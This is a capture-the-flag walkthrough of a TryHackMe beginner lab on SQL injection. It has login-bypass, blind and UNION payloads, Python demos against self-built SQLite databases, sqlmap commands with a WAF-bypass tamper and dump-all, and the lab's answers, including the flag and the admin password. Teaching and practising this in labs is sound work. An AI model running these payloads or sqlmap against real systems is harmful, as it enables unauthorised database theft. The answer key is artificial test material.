TryHackMe Advent of Cyber 2 Day 5 Walkthrough

    The platform builds virtual classrooms that let users deploy training environments with the click of a button and reinforce learning with a question-and-answer approach. It's a comfortable way to learn: the courses are pre-designed and come with virtual machines (VMs) hosted in the cloud.



    While the question-and-answer model makes learning easier, TryHackMe also lets users create their own virtual classrooms to teach particular topics, in effect becoming teachers. This gives other users rich and varied content, and it helps creators reinforce their own understanding of the fundamentals.



    Room :- https://tryhackme.com/room/adventofcyber2



    Advent of Cyber 2


    Get started with Cyber Security in 25 Days - Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

     

    [Day 5] Web Exploitation: Someone stole Santa's gift list!


    After last year's attack, Santa and the security team have worked hard on reviving Santa's personal portal. Hence, 'Santa's forum 2' went live.

    After the attack, logs revealed that someone had found Santa's panel on the website and logged into his account. Having done so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. The attacker threatened to publish a wishlist.txt file containing all of this information, but luckily for us he was caught by the CBI (Christmas Bureau of Investigation) before that. On MACHINE_IP:8000 you'll find a copy of the website, and your goal is to replicate the attacker's actions by dumping the gift list!



    What is SQL Injection?


    A SQL injection (SQLi) attack supplies input that the remote web application places unchanged into a SQL query, so that the attacker's input is executed as part of the query. A successful SQL injection exploit can read sensitive data from the database (usernames and passwords), modify database data (insert, update, delete), execute administrative operations on the database (such as shutting it down), and in some cases execute commands on the operating system.


    SQL Background


    SQL is the language used by programs to talk to relational databases. It is an extremely handy language that makes it easy for developers to organise data in various structures. Unfortunately, the benefit comes with a drawback: a single place where user input is pasted into a query string instead of being passed as a parameter is enough to open the door to SQL injection.

    I advise you to quickly go through this SQL command guide in order to make yourself familiar with the commands:



    List of SQL Commands | Codecademy






     

    It is important to mention that 1=1 in SQL always evaluates to true (shortly you'll see why this matters).


    How does an SQLi attack work?


    SQLi is carried out by abusing any input the application copies into a query: most visibly a GET parameter in the URL (for example ?username= or ?id=) of a vulnerable page, such as those covered in Day 2, but POST form fields, cookies and HTTP headers are just as usable. Search fields and login pages are the usual suspects, so as a penetration tester you need to note those down.

    Here's an example of how a username input field is typically handled in PHP: the script reads the username from the request and pastes it straight into a query string, something like SELECT * FROM users WHERE username='$username'.

    Once the username is part of the query text, the database selects all users with the provided username, and whatever the visitor typed has become part of the SQL. Exactly this fact can be abused by an attacker.

    Let's say a malicious user provides a single quotation mark (') as the username input. The query then contains that extra quote in addition to the two that were supposed to enclose the username (for example WHERE username='''), and the database raises a syntax error because the string literal is never properly terminated. Exactly this error is what tells you the input is being interpreted as SQL, and it is the starting point for exploiting the injection.

    Generally speaking, SQL injection is an attack in which your goal is to break out of the intended SQL, inject your own logic, and then 'fix' the broken remainder by commenting it out.

     


     

    Most commonly used comments for SQLi payloads:

    -- (everything to the end of the line; MySQL requires a space or another character after the two dashes, which is why you will see -- - and, in URLs, --+)
    # (to the end of the line; MySQL and MariaDB only)
    /* ... */ (block comment, supported by all major engines; also handy for replacing spaces, which is what sqlmap's space2comment tamper script does)


    Login Bypass with SQL Injection


    One of the most powerful applications of SQL injection is definitely login bypass. It allows an attacker to get into any account as long as they know the username; with a payload that makes the whole condition true, not even that is needed, because the application simply logs you in as the first user the query returns.

    First, let's find out the reason behind the possibility to do so. Say, our login application uses PHP to check if username and password match the database with following SQL query:


    SELECT username,password FROM users WHERE username='$username' and password='$password'

     

     
    As you see here, the query is using inputted username and password to validate it with the database.

    What happens if we input ' or true -- (note the space after the two dashes) into the username field? This turns the above query into:

    SELECT username,password FROM users WHERE username='' or true -- and password=''


     

    The -- has commented out the password check, so the application never verifies the password at all. This trick lets you log in to any account by putting the username, a closing quote and the comment marker into the username field.

    Note that some websites can use a different SQL query, such as:

    SELECT username,pass FROM users WHERE username=('$username') and password=('$password')

     

    In this case, you'll have to add a closing bracket to your payload, like so: ') or true -- , so that the injected expression closes the parenthesis the query opened before the comment removes the rest.

    You can practice login bypassing on the deployed machine on port 3000 (first browse to 10.10.200.48:3000/init.php and then to 10.10.200.48:3000, substituting your own machine's IP). I've put an extra interactive exercise there. It'll show you all the back-end output, allowing you to experiment and practice with SQL commands.
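The two query shapes above, exercised against a throwaway SQLite database, as an added example (this is not the room's code or the practice app on port 3000; the users table, its credentials and the function names are constructed for the demonstration). It shows the bypass succeeding against a string-built query, the plain payload breaking the bracketed query until a closing bracket is added, and the same input doing nothing against a parameterised query. SQLite is used because it is what the challenge target runs; note that SQLite accepts -- without a trailing space, while MySQL requires one.

```python
import sqlite3


def setup_db():
    """Constructed stand-in for the application's users table (not the
    challenge VM's real schema or credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("santa", "hohoho2020"), ("elf", "candycane")])
    return conn


def login_vulnerable(conn, username, password):
    """The query from the text, built by string concatenation: whatever the
    user types becomes part of the SQL. Returns the matched username, None
    for a failed login, or "ERROR" when the query no longer parses (a real
    app would show a stack trace or a 500 page here)."""
    query = ("SELECT username, password FROM users "
             f"WHERE username='{username}' AND password='{password}'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return "ERROR"
    return row[0] if row else None


def login_vulnerable_brackets(conn, username, password):
    """The second query shape from the text, with the values wrapped in
    parentheses, so the payload must close a bracket as well as a quote."""
    query = ("SELECT username, password FROM users "
             f"WHERE username=('{username}') AND password=('{password}')")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return "ERROR"
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with a parameterised query: the values travel separately
    from the SQL text, so a quote in the input can never end the string."""
    row = conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = setup_db()
    # 1=1 is always true, so the WHERE clause matches every row and the
    # comment removes the password check; the first user comes back.
    print(login_vulnerable(conn, "' OR 1=1 --", "anything"))            # santa
    # Knowing only the username, comment out the password check.
    print(login_vulnerable(conn, "elf' --", "anything"))                # elf
    # The same payload breaks the bracketed query instead of bypassing it...
    print(login_vulnerable_brackets(conn, "' OR 1=1 --", "anything"))   # ERROR
    # ...until a closing bracket is added in front of the OR.
    print(login_vulnerable_brackets(conn, "') OR 1=1 --", "anything"))  # santa
    # The parameterised version treats the payload as a literal username.
    print(login_safe(conn, "' OR 1=1 --", "anything"))                  # None
```

The "ERROR" return is the attacker's cue that the quote landed inside SQL but the payload did not fit the query shape; the fix on the defending side is the parameterised form, not stripping quotes from input.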


    Blind SQL Injection


    In some cases, developers mitigate the visible symptoms of SQL injection by stopping the application from displaying any error. Luckily for us, hiding the error does not remove the injection; it only removes the feedback.

    Blind SQL injection relies on some other observable change in the web application during the attack. In other words, an error (or a true/false condition) in the SQL query shows up in some other form, such as changed content, a missing record or a different response time.

    Since in this situation we can only see whether the query succeeded or not, blind SQLi is carried out by asking the database 'yes' or 'no' questions (error or changed page = 'No', normal page = 'Yes'). Through that system an attacker can guess the database name, read columns and so on, one character per question. Blind SQLi takes more time than the other types, but it is probably the most common one in the wild.

    Start off by finding a way to cause the SQL error and then fixing it back.

     

     


    Breaking the application (screenshot)

    Fixing it (screenshot). Notice how the app did not output any error, even though I've clearly caused an SQL error.

    For asking the questions, you can use the SUBSTR() SQL function. It extracts a substring from a string; wrapped in ASCII(), the single character it returns can be compared with a numeric ASCII code:

    ascii(substr((select database()),1,1)) = 115

    The above expression asks the database whether the first letter of its name is equal to 115 ('s' in the ASCII table).

    Now put this into a payload:

    ?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+

    The payload is the question (the + at the end is a URL-encoded space, which MySQL needs after -- for the comment to count). If the application responds exactly as it does for ?id=1, then the answer is 'Yes' (the database's first letter is 's'). Any error or change = 'No'. Repeat with 116, 117, ... for each position (or binary-search the character range) until the whole name is recovered.

     


     

    Note: blind SQLi techniques also work in the 'open' situation, where errors are displayed; they are just slower than reading the output directly.
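The yes/no extraction loop described above, as an added example against a constructed SQLite database (not the room's code; the gifts and users tables, the seeded admin password and the endpoint name are assumptions). The page's payload uses MySQL's ascii() and database(); SQLite has neither, so the example uses unicode() and reads table names from sqlite_master instead. The oracle only reports whether a gift was found, exactly the 'changed content' signal of a blind injection, and a binary search cuts the questions per character from up to 95 to about seven.

```python
import sqlite3


def setup_db():
    """Constructed stand-in for the challenge database. The admin password
    is seeded here only so the extraction below can be checked against it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gifts (id INTEGER, kid TEXT, gift TEXT)")
    conn.executemany("INSERT INTO gifts VALUES (?, ?, ?)",
                     [(1, "Paul", "a red bicycle"), (2, "Anna", "a telescope")])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'N0rthP0le!')")
    return conn


def gift_page_has_result(conn, raw_id):
    """Vulnerable endpoint: the ?id= value is dropped straight into the
    query. It never shows rows or errors to the caller; all that leaks is
    whether a gift was found (the 'changed content' of a blind injection)."""
    try:
        row = conn.execute(f"SELECT gift FROM gifts WHERE id={raw_id}").fetchone()
    except sqlite3.Error:
        return False          # errors are swallowed, so an error reads as 'No'
    return row is not None


def make_oracle(conn):
    """Wrap the endpoint as the yes/no oracle the attacker talks to."""
    return lambda payload: gift_page_has_result(conn, payload)


def extract_blind(oracle, expression, max_len=64):
    """Recover the string that `expression` evaluates to, one character at a
    time, using only yes/no answers from `oracle`. A binary search over the
    printable ASCII range (32..126) needs about 7 questions per character
    instead of up to 95 equality tests."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop once the string is shorter than the position being probed.
        if not oracle(f"1 AND length(({expression})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite's unicode() is the counterpart of MySQL's ascii().
            if oracle(f"1 AND unicode(substr(({expression}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    conn = setup_db()
    oracle = make_oracle(conn)
    # Enumerate the schema first (SQLite keeps it in sqlite_master)...
    print(extract_blind(oracle, "SELECT name FROM sqlite_master "
                                "WHERE type='table' ORDER BY name LIMIT 1"))   # gifts
    # ...then read the secret the page never displays.
    print(extract_blind(oracle, "SELECT password FROM users "
                                "WHERE username='admin'"))                      # N0rthP0le!
```

Every question is a separate request, so on a real target this loop is what generates the telltale burst of near-identical requests with incrementing numbers that a WAF or log review can spot.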


    UNION SQL Injection


    UNION SQLi is mainly used for fast database enumeration, as the UNION operator allows you to combine the results of multiple SELECT statements into one result set that the page then renders for you. It only works when the application displays query results, and every SELECT joined by UNION must return the same number of columns with compatible types, which is why the first two stages below exist.

     

    UNION SQLi attack consists of 3 stages:

    1.     Finding the number of columns
    2.     Checking if the columns are suitable
    3.     Attack and get some interesting data.


     

    Determining the number of columns required in an SQL injection UNION attack

    There are two common ways to detect it:

    The first one involves injecting a series of ORDER BY clauses with an increasing column index until an error occurs: ' ORDER BY 1-- , then ' ORDER BY 2-- , then ' ORDER BY 3-- and so on.

    (The last value before the error indicates the number of columns.)

    The second one (most common and effective) involves submitting a series of UNION SELECT payloads with an increasing number of NULL values: ' UNION SELECT NULL-- , then ' UNION SELECT NULL,NULL-- , then ' UNION SELECT NULL,NULL,NULL-- and so on.

    No error = the number of NULLs matches the number of columns.
     

    Finding columns with a useful data type in an SQL injection UNION attack

    Generally, the interesting data that you want to retrieve will be in string form. Having already determined the number of required columns (for example 4), you can probe each column to test whether it can hold string data by replacing one NULL at a time in the UNION SELECT payload with a string value. In the case of 4 you would submit:

    ' UNION SELECT 'a',NULL,NULL,NULL--
    ' UNION SELECT NULL,'a',NULL,NULL--
    ' UNION SELECT NULL,NULL,'a',NULL--
    ' UNION SELECT NULL,NULL,NULL,'a'--

    No error, and the 'a' appearing on the page = that column's data type is useful for us (string). This matters most on strictly typed engines such as PostgreSQL or MSSQL; MySQL and SQLite coerce freely, so every column usually passes.

    Using an SQL injection UNION attack to retrieve interesting data

    When you have determined the number of columns and found which columns can hold string data, you can finally start retrieving interesting data.

     

    Suppose that:

    • The first two steps showed exactly two existing columns with useful datatype.
    • The database contains a table called users with the columns username and password.


    In this situation, you can retrieve the contents of the users table by submitting the input:

    ' UNION SELECT username, password FROM users --



    Here's a small list of things you'd want to retrieve:

    •     database() (the current database name; MySQL)
    •     user() (the account the application connects as; MySQL)
    •     @@version (the server version; MySQL and MSSQL)
    •     username and password (from the application's users table, whatever it is called)
    •     table_name (from information_schema.tables)
    •     column_name (from information_schema.columns)

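The three UNION stages above, run end to end against a constructed SQLite database as an added example (not the room's code; the gifts table, the users table and the search endpoint are assumptions). Column counting is shown both ways (ORDER BY and UNION SELECT NULL), the string-column probe records which positions render a test string, and the last stage pulls username and password through a usable column. Because SQLite does not enforce column types, the probe reports every column as usable; on PostgreSQL or MSSQL a mismatched column would error out instead.

```python
import sqlite3


def setup_db():
    """Constructed stand-in for the challenge database (not its real schema
    or contents)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gifts (id INTEGER, kid TEXT, gift TEXT, year INTEGER)")
    conn.executemany("INSERT INTO gifts VALUES (?, ?, ?, ?)",
                     [(1, "Paul", "a red bicycle", 2020),
                      (2, "Anna", "a telescope", 2020)])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'N0rthP0le!')")
    return conn


def search_gifts(conn, term):
    """Vulnerable search box: the term is concatenated into the query and
    every row that comes back is rendered, so UNION rows become visible.
    Returns the rows, or None when the database rejected the query (the
    app would show a generic error page)."""
    try:
        return conn.execute(
            f"SELECT kid, gift, year FROM gifts WHERE kid LIKE '%{term}%'"
        ).fetchall()
    except sqlite3.Error:
        return None


def make_search(conn):
    """Wrap the endpoint as the function the attacker drives."""
    return lambda term: search_gifts(conn, term)


def count_columns_order_by(search, max_cols=10):
    """Stage 1, first method: raise ORDER BY n until the query errors; the
    last value that worked is the column count."""
    for n in range(1, max_cols + 1):
        if search(f"' ORDER BY {n} --") is None:
            return n - 1
    return None


def count_columns_union_null(search, max_cols=10):
    """Stage 1, second method: add NULLs until UNION SELECT stops erroring."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if search(f"' UNION SELECT {nulls} --") is not None:
            return n
    return None


def string_columns(search, ncols, marker="thmtest"):
    """Stage 2: place a marker string in one column at a time and record
    the positions where it is accepted and rendered."""
    usable = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        rows = search(f"' UNION SELECT {','.join(cols)} --")
        if rows is not None and any(row[i] == marker for row in rows):
            usable.append(i)
    return usable


def dump_users(search, ncols, col):
    """Stage 3: pull username:password pairs through a usable column."""
    cols = ["NULL"] * ncols
    cols[col] = "username || ':' || password"
    rows = search(f"' UNION SELECT {','.join(cols)} FROM users --")
    # The genuine gift rows come back too; keep only the injected ones.
    return [row[col] for row in rows if row[col] and ":" in str(row[col])]


if __name__ == "__main__":
    conn = setup_db()
    search = make_search(conn)
    ncols = count_columns_order_by(search)
    print("columns:", ncols, count_columns_union_null(search))   # 3 3
    usable = string_columns(search, ncols)
    print("string columns:", usable)                              # [0, 1, 2]
    print("users:", dump_users(search, ncols, usable[0]))         # ['admin:N0rthP0le!']
```

Concatenating several columns into one (username || ':' || password here; CONCAT() on MySQL) is the usual trick when fewer string columns are available than fields you want to read.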

     

    SQLMap


    SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It's an incredible tool that can be learned within minutes. It's already included in THM's AttackBox, or you can install it locally by running:

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev




    Let's show an example of an SQLMap command. Let's say we have a vulnerable login form located at "http://tbfc.net/login.php". (Note, this is just an example; please do not SQLMap this website, as no consent has been given by the owner.) We pass this address with --url to tell SQLMap where to attack, i.e. sqlmap --url http://tbfc.net/login.php

    We can then enumerate what data is in the application's database with options such as --tables and --columns, leaving our final SQLMap command looking like so: sqlmap --url http://tbfc.net/login.php --tables --columns

    Again, tbfc.net is given as an example; please do not perform any attack on this site.
     

    You can find a cheatsheet for more snippets of SQLMap commands here

     

     

    SQLMap & BurpSuite


    One of the most useful features of sqlmap is how well it works together with Burp Suite.

    With Burp Suite, you can capture and save a login or search request to use with SQLMap. This is done by intercepting the request, which means your browser needs to be configured to use Burp Suite as its proxy. The AttackBox makes this simple with the FoxyProxy extension in Firefox.

        

    1) First let's startup BurpSuite located in "Applications -> Web -> BurpSuite Community Edition" on the AttackBox
    2) Use Firefox to visit the application we suspect to be vulnerable
    3) Enable FoxyProxy in Firefox:

     


     

    4) Submit a request on the web application we suspect to be vulnerable
    5) Send the request from the "Proxy" tab to the repeater by right-clicking and pressing "Send to Repeater"
    6) Notice our request is now in the "Repeater" tab:




    7) Finally, save this request by right-clicking and pressing "Save item"



    We can then feed this saved request to SQLMap:

    sqlmap -r filename

    SQLMap parses the raw request (method, URL, headers, cookies and body), tests each parameter it finds for injection and, with the enumeration options above, dumps the database for you.


    Challenge


    Visit the vulnerable application in Firefox, find Santa's secret login panel and bypass the login. Use some of the commands and tools covered throughout today's task to answer Questions #3 to #6.

    Santa reads some documentation that he wrote when setting up the application, it reads:

    Santa's TODO: Look at alternative database systems that are better than sqlite. Also, don't forget that you installed a Web Application Firewall (WAF) after last year's attack. In case you've forgotten the command, you can tell SQLMap to try and bypass the WAF by using --tamper=space2comment


    Resources


    Check out this cheat sheet: swisskyrepo/PayloadsAllTheThings

    Payload list: payloadbox/sql-injection-payload-list

    In-depth SQL Injection tutorial: SQLi Basics



    1) Without using directory brute forcing, what's Santa's secret login panel?

    HINT :- The name is derived out of 2 words from this question. /s**tap***l

    Ans :- /santapanel


    Visit your machine's IP (it will differ from the one in the screenshot) with the /santapanel directory appended.




     

    Using Burp with SQLMap

    We will bypass the login page through SQL injection. First, set the browser's proxy to Burp Suite, enable the Intercept option in Burp, then load the login page, submit the form and intercept the request.

    Right-click in the request pane and save it under any name, for example panel_request.

    Now let's run SQLMap against the saved request and find the answers to all the questions:

    sudo sqlmap -r panel_request --tamper=space2comment --dump-all --dbms sqlite

    --tamper=space2comment rewrites the spaces in each payload as /**/ comments, which slips past the WAF Santa mentioned; --dbms sqlite skips fingerprinting because the documentation already told us the back end; --dump-all pulls every table out of the database.



    2) How many entries are there in the gift database?

    Ans :-  22

     

    3) What did Paul ask for?


    Ans :-  Github Ownership


    4) What is the flag?


    Ans :-  thmfox{All_I_Want_for_Christmas_Is_You}

     
    5) What is admin's password?

    Ans :- EhCNSWzzFP6sc7gB





    Disclaimer


    This was written for educational purposes and penetration testing only.
    The author will not be responsible for any damage!
    The author is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

